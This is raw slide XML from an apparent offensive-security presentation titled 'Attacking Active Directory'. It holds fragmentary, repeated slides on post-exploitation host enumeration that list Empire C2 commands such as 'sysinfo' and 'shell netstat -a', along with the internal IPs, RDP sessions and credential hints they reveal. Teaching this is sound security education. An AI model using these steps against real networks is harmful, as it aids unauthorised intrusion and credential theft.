            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2B04F6-2D7E-4DDA-8E43-B13143B0B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="1500725"/>
            <a:ext cx="9394399" cy="4989087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951AD8FE-337B-4C8F-9E36-8FD0FB965D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="4233923"/>
            <a:ext cx="3688781" cy="421451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500"/>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8588918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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1652178"/>
            <a:ext cx="3688781" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain\User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Shell Integrity level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PSH version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2B04F6-2D7E-4DDA-8E43-B13143B0B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="1500725"/>
            <a:ext cx="9394399" cy="4989087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951AD8FE-337B-4C8F-9E36-8FD0FB965D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="5857636"/>
            <a:ext cx="3688781" cy="421451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500"/>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836751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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="1663409"/>
            <a:ext cx="11697286" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Routing tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Open ports  // possibly for escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>RDP / SSH connections may indicate saved profiles and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>passwords|keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Simple things like netstat can aid in fingerprinting the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Help identify internal IPs/Ranges you wouldn’t have guessed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2067340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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8421718" y="1657721"/>
            <a:ext cx="3799825" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      shell netstat -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal IP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Local Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RDP sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697FCC31-58BE-4DDC-A670-75CE9ADAE792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1517117"/>
            <a:ext cx="8384867" cy="5028485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11320826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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8421718" y="1657721"/>
            <a:ext cx="3799825" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      shell netstat -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal IP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Local Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RDP sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697FCC31-58BE-4DDC-A670-75CE9ADAE792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1517117"/>
            <a:ext cx="8384867" cy="5028485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F074BDA6-3517-4785-8369-537D1A21E2E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076179" y="2447778"/>
            <a:ext cx="5444196" cy="4097824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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5248627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9FC6F7-025A-4B77-85F2-6DAA83802F19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154954" y="0"/>
            <a:ext cx="9063244" cy="3329581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F7BD925-0EA9-49D4-8B76-805472C58284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154954" y="5414054"/>
            <a:ext cx="8825658" cy="1350885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ryan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preston</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC36EFD4-DE63-4972-9265-43E89FE2F352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090786" y="3559661"/>
            <a:ext cx="10595888" cy="1461518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
